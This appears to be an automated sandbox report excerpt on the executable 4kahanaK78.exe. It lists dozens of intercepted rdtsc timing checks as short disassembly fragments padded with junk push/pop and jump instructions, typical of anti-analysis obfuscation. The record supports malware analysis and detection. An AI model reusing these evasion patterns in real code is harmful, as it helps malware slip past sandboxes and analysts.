Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9D5C31 second address: 9D5C51 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0E055074FCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e jmp 00007F0E055074FBh 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9D025D second address: 9D0267 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F0E05506CE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9D7B3D second address: 9D7B59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E05507508h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9D7B59 second address: 9D7B5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9D8C26 second address: 9D8C30 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0E055074FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9DAC3D second address: 9DAC41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9DAC41 second address: 9DAC47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9DAC47 second address: 9DAC51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F0E05506CE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 98375B second address: 98375F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 98375F second address: 983765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 983765 second address: 98376E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9D0CA9 second address: 9D0CAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9D3CF5 second address: 9D3CFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9E018A second address: 9E01B0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F0E05506CF7h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9E224F second address: 9E2254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9E2254 second address: 9E2259 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9D9F35 second address: 9D9F3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9D9F3E second address: 9D9F42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9E3370 second address: 9E33E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dword ptr [esp], eax 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007F0E055074F8h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 00000018h 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 cmc 0x00000022 xor bx, C346h 0x00000027 push 00000000h 0x00000029 movzx ebx, dx 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push esi 0x00000031 call 00007F0E055074F8h 0x00000036 pop esi 0x00000037 mov dword ptr [esp+04h], esi 0x0000003b add dword ptr [esp+04h], 0000001Bh 0x00000043 inc esi 0x00000044 push esi 0x00000045 ret 0x00000046 pop esi 0x00000047 ret 0x00000048 sub dword ptr [ebp+122DB53Ah], ebx 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007F0E05507503h 0x00000056 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9E13DD second address: 9E145B instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0E05506CECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F0E05506CE8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 push dword ptr fs:[00000000h] 0x0000002e jmp 00007F0E05506CF4h 0x00000033 mov dword ptr fs:[00000000h], esp 0x0000003a pushad 0x0000003b mov dword ptr [ebp+122D2E61h], ecx 0x00000041 popad 0x00000042 mov eax, dword ptr [ebp+122D0D35h] 0x00000048 stc 0x00000049 push FFFFFFFFh 0x0000004b mov bx, 873Ah 0x0000004f nop 0x00000050 js 00007F0E05506CFCh 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F0E05506CEEh 0x0000005d rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9E23E4 second address: 9E23E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9E3519 second address: 9E3522 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9E3522 second address: 9E3526 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9E3526 second address: 9E353C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jl 00007F0E05506CF2h 0x0000000e js 00007F0E05506CECh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9E24D8 second address: 9E24DE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9DAE8F second address: 9DAE93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9DAE93 second address: 9DAE97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 97E575 second address: 97E5A2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F0E05506CEAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c jmp 00007F0E05506CF9h 0x00000011 pushad 0x00000012 popad 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 97E5A2 second address: 97E5DF instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0E05507504h 0x00000008 push edi 0x00000009 ja 00007F0E055074F6h 0x0000000f pop edi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jmp 00007F0E05507509h 0x00000018 push ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 97E5DF second address: 97E5EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 je 00007F0E05506CEEh 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9EC779 second address: 9EC77D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9EC8D7 second address: 9EC8F9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007F0E05506CEEh 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9EC8F9 second address: 9EC90E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jno 00007F0E055074FCh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9F0BB4 second address: 9F0BD2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0E05506CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f jmp 00007F0E05506CEEh 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9F0CE7 second address: 9F0CF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9F0CF0 second address: 9F0CFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9F0CFF second address: 9F0D39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F0E05507503h 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F0E05507509h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9F0D39 second address: 9F0D43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F0E05506CE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9F661B second address: 9F6621 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9F6621 second address: 9F664F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E05506CF6h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F0E05506CEFh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9F664F second address: 9F6666 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E055074FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jl 00007F0E055074F6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9F6666 second address: 9F668E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0E05506CE6h 0x0000000a popad 0x0000000b jmp 00007F0E05506CF3h 0x00000010 popad 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 jnc 00007F0E05506CE6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9F668E second address: 9F66AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05507505h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9F66AD second address: 9F66B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9F6828 second address: 9F682C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9F682C second address: 9F6846 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05506CF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9F6846 second address: 9F685B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0E055074FAh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9F685B second address: 9F685F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9F6B50 second address: 9F6B56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9F6B56 second address: 9F6B5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9F6B5C second address: 9F6B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9F6F9F second address: 9F6FB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jne 00007F0E05506CE6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9F6FB0 second address: 9F6FB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A00BC2 second address: A00BE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0E05506CF7h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A00BE4 second address: A00BEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9FF8A2 second address: 9FF8A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9FFA21 second address: 9FFA27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9FFA27 second address: 9FFA56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F0E05506CEFh 0x00000010 jg 00007F0E05506CE6h 0x00000016 popad 0x00000017 jbe 00007F0E05506CEEh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A00004 second address: A00020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 jg 00007F0E055074F6h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0E055074FBh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A00020 second address: A0003D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E05506CF9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A0003D second address: A0004F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0E055074F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A0004F second address: A00053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A00053 second address: A00057 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A005F6 second address: A005FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A008A7 second address: A008B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A008B2 second address: A008B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A008B9 second address: A008D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0E055074F6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F0E055074F6h 0x00000013 jns 00007F0E055074F6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A048B6 second address: A048CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F0E05506CF0h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A048CF second address: A048D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A048D3 second address: A048D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A0A386 second address: A0A38F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A0A38F second address: A0A395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A0A395 second address: A0A3B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0E055074F6h 0x0000000a popad 0x0000000b js 00007F0E055074F8h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 popad 0x00000014 pushad 0x00000015 js 00007F0E055074FEh 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A0A3B4 second address: A0A3D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F0E05506CF6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A0A3D2 second address: A0A3D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A08DB1 second address: A08DB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A0965F second address: A09679 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05507506h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A097EB second address: A097EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A09928 second address: A0992D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A09A60 second address: A09A64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A09A64 second address: A09A68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A09A68 second address: A09A8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0E05506CF9h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A09A8B second address: A09A8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A09A8F second address: A09AA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05506CF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A09AA9 second address: A09AB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A08A9B second address: A08AB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0E05506CF0h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jg 00007F0E05506CE6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A0EE96 second address: A0EE9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A0EE9A second address: A0EEA7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0E05506CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A0EEA7 second address: A0EEAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9C9472 second address: 9C9478 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9C9478 second address: 9AEC3D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F0E05507502h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c and edx, 1B938F1Ah 0x00000012 lea eax, dword ptr [ebp+124801A3h] 0x00000018 mov edi, dword ptr [ebp+122D2DF3h] 0x0000001e nop 0x0000001f push ecx 0x00000020 push esi 0x00000021 pushad 0x00000022 popad 0x00000023 pop esi 0x00000024 pop ecx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 jmp 00007F0E05507500h 0x0000002d push eax 0x0000002e pop eax 0x0000002f popad 0x00000030 pop edx 0x00000031 nop 0x00000032 jnl 00007F0E055074F7h 0x00000038 call dword ptr [ebp+122D1862h] 0x0000003e pushad 0x0000003f pushad 0x00000040 pushad 0x00000041 popad 0x00000042 pushad 0x00000043 popad 0x00000044 pushad 0x00000045 popad 0x00000046 popad 0x00000047 jno 00007F0E055074FCh 0x0000004d jmp 00007F0E055074FCh 0x00000052 pushad 0x00000053 pushad 0x00000054 popad 0x00000055 pushad 0x00000056 popad 0x00000057 jmp 00007F0E05507502h 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
